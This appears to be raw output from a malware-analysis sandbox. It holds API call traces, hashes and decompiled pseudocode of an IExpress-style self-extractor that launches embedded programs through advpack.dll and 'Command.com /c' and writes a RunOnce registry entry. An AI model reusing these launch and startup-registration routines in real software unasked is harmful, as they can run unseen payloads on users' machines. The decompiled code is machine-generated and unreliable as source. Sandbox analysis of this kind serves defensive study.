                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A3208C
                                                                          • Part of subcall function 00A3171E: _vsnprintf.MSVCRT ref: 00A31750
                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A320C9
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A320EA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A32103
                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A32122
                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A32134
                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A32144
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A3215B
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A3218C
                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A321C1
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A321E4
                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A3223D
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A32249
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A32250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                        • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                        • API String ID: 178549006-2414900631
                                                                        • Opcode ID: 47e9ff77f8d10c2c1a66c679e2aa07ffb263ee93ec679ef7f854aea12a86e221
                                                                        • Instruction ID: efb5d68d83f380ee88cb41f853b1bd9bbfbd564ceaa62c2b4791be0f988f471c
                                                                        • Opcode Fuzzy Hash: 47e9ff77f8d10c2c1a66c679e2aa07ffb263ee93ec679ef7f854aea12a86e221
                                                                        • Instruction Fuzzy Hash: 8051F771A00224BBDB24DBA4DC49FFB777CEF55700F0042A8F985E7151DAB59E4A8B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 82%
                                                                        			E00A33BA2() {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				short _v300;
                                                                        				intOrPtr _v304;
                                                                        				void _v348;
                                                                        				char _v352;
                                                                        				intOrPtr _v356;
                                                                        				signed int _v360;
                                                                        				short _v364;
                                                                        				char* _v368;
                                                                        				intOrPtr _v372;
                                                                        				void* _v376;
                                                                        				intOrPtr _v380;
                                                                        				char _v384;
                                                                        				signed int _v388;
                                                                        				intOrPtr _v392;
                                                                        				signed int _v396;
                                                                        				signed int _v400;
                                                                        				signed int _v404;
                                                                        				void* _v408;
                                                                        				void* _v424;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t69;
                                                                        				signed int _t76;
                                                                        				void* _t77;
                                                                        				signed int _t79;
                                                                        				short _t96;
                                                                        				signed int _t97;
                                                                        				intOrPtr _t98;
                                                                        				signed int _t101;
                                                                        				signed int _t104;
                                                                        				signed int _t108;
                                                                        				int _t112;
                                                                        				void* _t115;
                                                                        				signed char _t118;
                                                                        				void* _t125;
                                                                        				signed int _t127;
                                                                        				void* _t128;
                                                                        				struct HINSTANCE__* _t129;
                                                                        				void* _t130;
                                                                        				short _t137;
                                                                        				char* _t140;
                                                                        				signed char _t144;
                                                                        				signed char _t145;
                                                                        				signed int _t149;
                                                                        				void* _t150;
                                                                        				void* _t151;
                                                                        				signed int _t153;
                                                                        				void* _t155;
                                                                        				void* _t156;
                                                                        				signed int _t157;
                                                                        				signed int _t162;
                                                                        				signed int _t164;
                                                                        				void* _t165;
                                                                        
                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                        				_t69 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t69 ^ _t164;
                                                                        				_t153 = 0;
                                                                        				 *0xa39124 =  *0xa39124 & 0;
                                                                        				_t149 = 0;
                                                                        				_v388 = 0;
                                                                        				_v384 = 0;
                                                                        				_t165 =  *0xa38a28 - _t153; // 0x0
                                                                        				if(_t165 != 0) {
                                                                        					L3:
                                                                        					_t127 = 0;
                                                                        					_v392 = 0;
                                                                        					while(1) {
                                                                        						_v400 = _v400 & 0x00000000;
                                                                        						memset( &_v348, 0, 0x44);
                                                                        						_t164 = _t164 + 0xc;
                                                                        						_v348 = 0x44;
                                                                        						if( *0xa38c42 != 0) {
                                                                        							goto L26;
                                                                        						}
                                                                        						_t146 =  &_v396;
                                                                        						_t115 = E00A3468F("SHOWWINDOW",  &_v396, 4);
                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                        							L25:
                                                                        							_t146 = 0x4b1;
                                                                        							E00A344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        							 *0xa39124 = 0x80070714;
                                                                        							goto L62;
                                                                        						} else {
                                                                        							if(_v396 != 1) {
                                                                        								__eflags = _v396 - 2;
                                                                        								if(_v396 != 2) {
                                                                        									_t137 = 3;
                                                                        									__eflags = _v396 - _t137;
                                                                        									if(_v396 == _t137) {
                                                                        										_v304 = 1;
                                                                        										_v300 = _t137;
                                                                        									}
                                                                        									goto L14;
                                                                        								}
                                                                        								_push(6);
                                                                        								_v304 = 1;
                                                                        								_pop(0);
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_v304 = 1;
                                                                        								L11:
                                                                        								_v300 = 0;
                                                                        								L14:
                                                                        								if(_t127 != 0) {
                                                                        									L27:
                                                                        									_t155 = 1;
                                                                        									__eflags = _t127 - 1;
                                                                        									if(_t127 != 1) {
                                                                        										L31:
                                                                        										_t132 =  &_v280;
                                                                        										_t76 = E00A31AE8( &_v280,  &_v408,  &_v404); // executed
                                                                        										__eflags = _t76;
                                                                        										if(_t76 == 0) {
                                                                        											L62:
                                                                        											_t77 = 0;
                                                                        											L63:
                                                                        											_pop(_t150);
                                                                        											_pop(_t156);
                                                                        											_pop(_t128);
                                                                        											return E00A36CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                        										}
                                                                        										_t157 = _v404;
                                                                        										__eflags = _t149;
                                                                        										if(_t149 != 0) {
                                                                        											L37:
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												L57:
                                                                        												_t151 = _v408;
                                                                        												_t146 =  &_v352;
                                                                        												_t130 = _t151; // executed
                                                                        												_t79 = E00A33FEF(_t130,  &_v352); // executed
                                                                        												__eflags = _t79;
                                                                        												if(_t79 == 0) {
                                                                        													L61:
                                                                        													LocalFree(_t151);
                                                                        													goto L62;
                                                                        												}
                                                                        												L58:
                                                                        												LocalFree(_t151);
                                                                        												_t127 = _t127 + 1;
                                                                        												_v396 = _t127;
                                                                        												__eflags = _t127 - 2;
                                                                        												if(_t127 >= 2) {
                                                                        													_t155 = 1;
                                                                        													__eflags = 1;
                                                                        													L69:
                                                                        													__eflags =  *0xa38580;
                                                                        													if( *0xa38580 != 0) {
                                                                        														E00A32267();
                                                                        													}
                                                                        													_t77 = _t155;
                                                                        													goto L63;
                                                                        												}
                                                                        												_t153 = _v392;
                                                                        												_t149 = _v388;
                                                                        												continue;
                                                                        											}
                                                                        											L38:
                                                                        											__eflags =  *0xa38180;
                                                                        											if( *0xa38180 == 0) {
                                                                        												_t146 = 0x4c7;
                                                                        												E00A344B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                        												LocalFree(_v424);
                                                                        												 *0xa39124 = 0x8007042b;
                                                                        												goto L62;
                                                                        											}
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											__eflags =  *0xa39a34 & 0x00000004;
                                                                        											if(__eflags == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											_t129 = E00A36495(_t127, _t132, _t157, __eflags);
                                                                        											__eflags = _t129;
                                                                        											if(_t129 == 0) {
                                                                        												_t146 = 0x4c8;
                                                                        												E00A344B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                        												L65:
                                                                        												LocalFree(_v408);
                                                                        												 *0xa39124 = E00A36285();
                                                                        												goto L62;
                                                                        											}
                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                        											_v404 = _t146;
                                                                        											__eflags = _t146;
                                                                        											if(_t146 == 0) {
                                                                        												_t146 = 0x4c9;
                                                                        												__eflags = 0;
                                                                        												E00A344B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                        												FreeLibrary(_t129);
                                                                        												goto L65;
                                                                        											}
                                                                        											__eflags =  *0xa38a30;
                                                                        											_t151 = _v408;
                                                                        											_v384 = 0;
                                                                        											_v368 =  &_v280;
                                                                        											_t96 =  *0xa39a40; // 0x3
                                                                        											_v364 = _t96;
                                                                        											_t97 =  *0xa38a38 & 0x0000ffff;
                                                                        											_v380 = 0xa39154;
                                                                        											_v376 = _t151;
                                                                        											_v372 = 0xa391e4;
                                                                        											_v360 = _t97;
                                                                        											if( *0xa38a30 != 0) {
                                                                        												_t97 = _t97 | 0x00010000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t144 =  *0xa39a34; // 0x1
                                                                        											__eflags = _t144 & 0x00000008;
                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                        												_t97 = _t97 | 0x00020000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t144 & 0x00000010;
                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                        												_t97 = _t97 | 0x00040000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t145 =  *0xa38d48; // 0x0
                                                                        											__eflags = _t145 & 0x00000040;
                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                        												_t97 = _t97 | 0x00080000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t145;
                                                                        											if(_t145 < 0) {
                                                                        												_t104 = _t97 | 0x00100000;
                                                                        												__eflags = _t104;
                                                                        												_v360 = _t104;
                                                                        											}
                                                                        											_t98 =  *0xa39a38; // 0x0
                                                                        											_v356 = _t98;
                                                                        											_t130 = _t146;
                                                                        											 *0xa3a288( &_v384);
                                                                        											_t101 = _v404();
                                                                        											__eflags = _t164 - _t164;
                                                                        											if(_t164 != _t164) {
                                                                        												_t130 = 4;
                                                                        												asm("int 0x29");
                                                                        											}
                                                                        											 *0xa39124 = _t101;
                                                                        											_push(_t129);
                                                                        											__eflags = _t101;
                                                                        											if(_t101 < 0) {
                                                                        												FreeLibrary();
                                                                        												goto L61;
                                                                        											} else {
                                                                        												FreeLibrary();
                                                                        												_t127 = _v400;
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags =  *0xa39a40 - 1; // 0x3
                                                                        										if(__eflags == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags =  *0xa38a20;
                                                                        										if( *0xa38a20 == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags = _t157;
                                                                        										if(_t157 != 0) {
                                                                        											goto L38;
                                                                        										}
                                                                        										_v388 = 1;
                                                                        										E00A3202A(_t146); // executed
                                                                        										goto L37;
                                                                        									}
                                                                        									_t146 =  &_v280;
                                                                        									_t108 = E00A3468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                        									__eflags = _t108;
                                                                        									if(_t108 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									__eflags =  *0xa38c42;
                                                                        									if( *0xa38c42 != 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                        									__eflags = _t112 == 0;
                                                                        									if(_t112 == 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								_t118 =  *0xa38a38; // 0x0
                                                                        								if(_t118 == 0) {
                                                                        									L23:
                                                                        									if(_t153 != 0) {
                                                                        										goto L31;
                                                                        									}
                                                                        									_t146 =  &_v276;
                                                                        									if(E00A3468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                        										goto L27;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                        									__eflags = _t118 & 0x00000002;
                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									_t140 = "USRQCMD";
                                                                        									L20:
                                                                        									_t146 =  &_v276;
                                                                        									if(E00A3468F(_t140,  &_v276, 0x104) == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                        										_t153 = 1;
                                                                        										_v388 = 1;
                                                                        									}
                                                                        									goto L23;
                                                                        								}
                                                                        								_t140 = "ADMQCMD";
                                                                        								goto L20;
                                                                        							}
                                                                        						}
                                                                        						L26:
                                                                        						_push(_t130);
                                                                        						_t146 = 0x104;
                                                                        						E00A31781( &_v276, 0x104, _t130, 0xa38c42);
                                                                        						goto L27;
                                                                        					}
                                                                        				}
                                                                        				_t130 = "REBOOT";
                                                                        				_t125 = E00A3468F(_t130, 0xa39a2c, 4);
                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                        					goto L25;
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        			}





























































                                                                        0x00a33fe8
                                                                        0x00a33f33
                                                                        0x00a33f37
                                                                        0x00000000
                                                                        0x00a33f37
                                                                        0x00a33dee
                                                                        0x00a33dee
                                                                        0x00a33df5
                                                                        0x00a33fad
                                                                        0x00a33fb9
                                                                        0x00a33fc2
                                                                        0x00a33fc8
                                                                        0x00000000
                                                                        0x00a33fc8
                                                                        0x00a33dfb
                                                                        0x00a33dfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33e03
                                                                        0x00a33e0a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33e15
                                                                        0x00a33e17
                                                                        0x00a33e19
                                                                        0x00a33f94
                                                                        0x00a33fa4
                                                                        0x00a33f7c
                                                                        0x00a33f80
                                                                        0x00a33f8b
                                                                        0x00000000
                                                                        0x00a33f8b
                                                                        0x00a33e2c
                                                                        0x00a33e30
                                                                        0x00a33e34
                                                                        0x00a33e36
                                                                        0x00a33f69
                                                                        0x00a33f6e
                                                                        0x00a33f70
                                                                        0x00a33f76
                                                                        0x00000000
                                                                        0x00a33f76
                                                                        0x00a33e3c
                                                                        0x00a33e43
                                                                        0x00a33e47
                                                                        0x00a33e52
                                                                        0x00a33e56
                                                                        0x00a33e5c
                                                                        0x00a33e61
                                                                        0x00a33e68
                                                                        0x00a33e70
                                                                        0x00a33e74
                                                                        0x00a33e7c
                                                                        0x00a33e80
                                                                        0x00a33e82
                                                                        0x00a33e82
                                                                        0x00a33e87
                                                                        0x00a33e87
                                                                        0x00a33e8b
                                                                        0x00a33e91
                                                                        0x00a33e94
                                                                        0x00a33e96
                                                                        0x00a33e96
                                                                        0x00a33e9b
                                                                        0x00a33e9b
                                                                        0x00a33e9f
                                                                        0x00a33ea2
                                                                        0x00a33ea4
                                                                        0x00a33ea4
                                                                        0x00a33ea9
                                                                        0x00a33ea9
                                                                        0x00a33ead
                                                                        0x00a33eb3
                                                                        0x00a33eb6
                                                                        0x00a33eb8
                                                                        0x00a33eb8
                                                                        0x00a33ebd
                                                                        0x00a33ebd
                                                                        0x00a33ec1
                                                                        0x00a33ec3
                                                                        0x00a33ec5
                                                                        0x00a33ec5
                                                                        0x00a33eca
                                                                        0x00a33eca
                                                                        0x00a33ece
                                                                        0x00a33ed5
                                                                        0x00a33ed9
                                                                        0x00a33ee0
                                                                        0x00a33ee6
                                                                        0x00a33eea
                                                                        0x00a33eec
                                                                        0x00a33eee
                                                                        0x00a33ef3
                                                                        0x00a33ef3
                                                                        0x00a33ef5
                                                                        0x00a33efa
                                                                        0x00a33efb
                                                                        0x00a33efd
                                                                        0x00a33f40
                                                                        0x00000000
                                                                        0x00a33eff
                                                                        0x00a33eff
                                                                        0x00a33f05
                                                                        0x00000000
                                                                        0x00a33f05
                                                                        0x00a33efd
                                                                        0x00a33dc7
                                                                        0x00a33dce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33dd0
                                                                        0x00a33dd7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33dd9
                                                                        0x00a33ddb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33ddd
                                                                        0x00a33de1
                                                                        0x00000000
                                                                        0x00a33de1
                                                                        0x00a33d59
                                                                        0x00a33d65
                                                                        0x00a33d6a
                                                                        0x00a33d6c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33d6e
                                                                        0x00a33d75
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33d8f
                                                                        0x00a33d96
                                                                        0x00a33d98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33d98
                                                                        0x00a33c8f
                                                                        0x00a33c98
                                                                        0x00a33cf1
                                                                        0x00a33cf3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33cfe
                                                                        0x00a33d11
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33d11
                                                                        0x00a33c9c
                                                                        0x00a33ca5
                                                                        0x00a33ca7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33cad
                                                                        0x00a33cb2
                                                                        0x00a33cb7
                                                                        0x00a33cc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33ce8
                                                                        0x00a33cec
                                                                        0x00a33ced
                                                                        0x00a33ced
                                                                        0x00000000
                                                                        0x00a33ce8
                                                                        0x00a33c9e
                                                                        0x00000000
                                                                        0x00a33c9e
                                                                        0x00a33c56
                                                                        0x00a33d35
                                                                        0x00a33d35
                                                                        0x00a33d3c
                                                                        0x00a33d48
                                                                        0x00000000
                                                                        0x00a33d48
                                                                        0x00a33c03
                                                                        0x00a33be2
                                                                        0x00a33be7
                                                                        0x00a33bee
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00A33C11
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00A33CDC
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00A38C42), ref: 00A33D8F
                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00A33E26
                                                                        • FreeLibrary.KERNEL32(00000000,?,00A38C42), ref: 00A33EFF
                                                                        • LocalFree.KERNEL32(?,?,?,?,00A38C42), ref: 00A33F1F
                                                                        • FreeLibrary.KERNEL32(00000000,?,00A38C42), ref: 00A33F40
                                                                        • LocalFree.KERNEL32(?,?,?,?,00A38C42), ref: 00A33F47
                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00A38C42), ref: 00A33F76
                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00A38C42), ref: 00A33F80
                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00A38C42), ref: 00A33FC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                        • String ID: <None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$zhiga
                                                                        • API String ID: 1032054927-2225721525
                                                                        • Opcode ID: a5422213361df776cc312e7b71a14ab0c3ba8605bd8effa4e10c3accfa7a3bd0
                                                                        • Instruction ID: 32d1d98a214ac547381838c3153e5d06d2e057e688c1518aa3fd027624c6bfdf
                                                                        • Opcode Fuzzy Hash: a5422213361df776cc312e7b71a14ab0c3ba8605bd8effa4e10c3accfa7a3bd0
                                                                        • Instruction Fuzzy Hash: 1CB1037290C3019FDB24DF648D46B6B76E4EB85740F104A2DFA85D61A0DB74CA46CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 82%
                                                                        			E00A31AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v527;
                                                                        				char _v528;
                                                                        				char _v1552;
                                                                        				CHAR* _v1556;
                                                                        				int* _v1560;
                                                                        				CHAR** _v1564;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t48;
                                                                        				CHAR* _t53;
                                                                        				CHAR* _t54;
                                                                        				char* _t57;
                                                                        				char* _t58;
                                                                        				CHAR* _t60;
                                                                        				void* _t62;
                                                                        				signed char _t65;
                                                                        				intOrPtr _t76;
                                                                        				intOrPtr _t77;
                                                                        				unsigned int _t85;
                                                                        				CHAR* _t90;
                                                                        				CHAR* _t92;
                                                                        				char _t105;
                                                                        				char _t106;
                                                                        				CHAR** _t111;
                                                                        				CHAR* _t115;
                                                                        				intOrPtr* _t125;
                                                                        				void* _t126;
                                                                        				CHAR* _t132;
                                                                        				CHAR* _t135;
                                                                        				void* _t138;
                                                                        				void* _t139;
                                                                        				void* _t145;
                                                                        				intOrPtr* _t146;
                                                                        				char* _t148;
                                                                        				CHAR* _t151;
                                                                        				void* _t152;
                                                                        				CHAR* _t155;
                                                                        				CHAR* _t156;
                                                                        				void* _t157;
                                                                        				signed int _t158;
                                                                        
                                                                        				_t48 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t48 ^ _t158;
                                                                        				_t108 = __ecx;
                                                                        				_v1564 = _a4;
                                                                        				_v1560 = _a8;
                                                                        				E00A31680( &_v528, 0x104, __ecx);
                                                                        				if(_v528 != 0x22) {
                                                                        					_t135 = " ";
                                                                        					_t53 =  &_v528;
                                                                        				} else {
                                                                        					_t135 = "\"";
                                                                        					_t53 =  &_v527;
                                                                        				}
                                                                        				_t111 =  &_v1556;
                                                                        				_v1556 = _t53;
                                                                        				_t54 = E00A31A84(_t111, _t135);
                                                                        				_t156 = _v1556;
                                                                        				_t151 = _t54;
                                                                        				if(_t156 == 0) {
                                                                        					L12:
                                                                        					_push(_t111);
                                                                        					E00A31781( &_v268, 0x104, _t111, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        					E00A3658A( &_v268, 0x104, _t156);
                                                                        					goto L13;
                                                                        				} else {
                                                                        					_t132 = _t156;
                                                                        					_t148 =  &(_t132[1]);
                                                                        					do {
                                                                        						_t105 =  *_t132;
                                                                        						_t132 =  &(_t132[1]);
                                                                        					} while (_t105 != 0);
                                                                        					_t111 = _t132 - _t148;
                                                                        					if(_t111 < 3) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t106 = _t156[1];
                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					} else {
                                                                        						L11:
                                                                        						E00A31680( &_v268, 0x104, _t156);
                                                                        						L13:
                                                                        						_t138 = 0x2e;
                                                                        						_t57 = E00A366C8(_t156, _t138);
                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                        							_t139 = 0x2e;
                                                                        							_t115 = _t156;
                                                                        							_t58 = E00A366C8(_t115, _t139);
                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                        								if(_t156 == 0) {
                                                                        									goto L43;
                                                                        								}
                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                        									E00A31680( &_v1552, 0x400, _t108);
                                                                        								} else {
                                                                        									_push(_t115);
                                                                        									_t108 = 0x400;
                                                                        									E00A31781( &_v1552, 0x400, _t115,  &_v268);
                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                        										E00A316B3( &_v1552, 0x400, " ");
                                                                        										E00A316B3( &_v1552, 0x400, _t151);
                                                                        									}
                                                                        								}
                                                                        								_t140 = _t156;
                                                                        								 *_t156 = 0;
                                                                        								E00A32AAC( &_v1552, _t156, _t156);
                                                                        								goto L53;
                                                                        							} else {
                                                                        								_t108 = "Command.com /c %s";
                                                                        								_t125 = "Command.com /c %s";
                                                                        								_t145 = _t125 + 1;
                                                                        								do {
                                                                        									_t76 =  *_t125;
                                                                        									_t125 = _t125 + 1;
                                                                        								} while (_t76 != 0);
                                                                        								_t126 = _t125 - _t145;
                                                                        								_t146 =  &_v268;
                                                                        								_t157 = _t146 + 1;
                                                                        								do {
                                                                        									_t77 =  *_t146;
                                                                        									_t146 = _t146 + 1;
                                                                        								} while (_t77 != 0);
                                                                        								_t140 = _t146 - _t157;
                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                        								if(_t156 != 0) {
                                                                        									E00A3171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                        									goto L53;
                                                                        								}
                                                                        								goto L43;
                                                                        							}
                                                                        						} else {
                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                        								_t140 = 0x525;
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_t60 =  &_v268;
                                                                        								goto L35;
                                                                        							} else {
                                                                        								_t140 = "[";
                                                                        								_v1556 = _t151;
                                                                        								_t90 = E00A31A84( &_v1556, "[");
                                                                        								if(_t90 != 0) {
                                                                        									if( *_t90 != 0) {
                                                                        										_v1556 = _t90;
                                                                        									}
                                                                        									_t140 = "]";
                                                                        									E00A31A84( &_v1556, "]");
                                                                        								}
                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                        								if(_t156 == 0) {
                                                                        									L43:
                                                                        									_t60 = 0;
                                                                        									_t140 = 0x4b5;
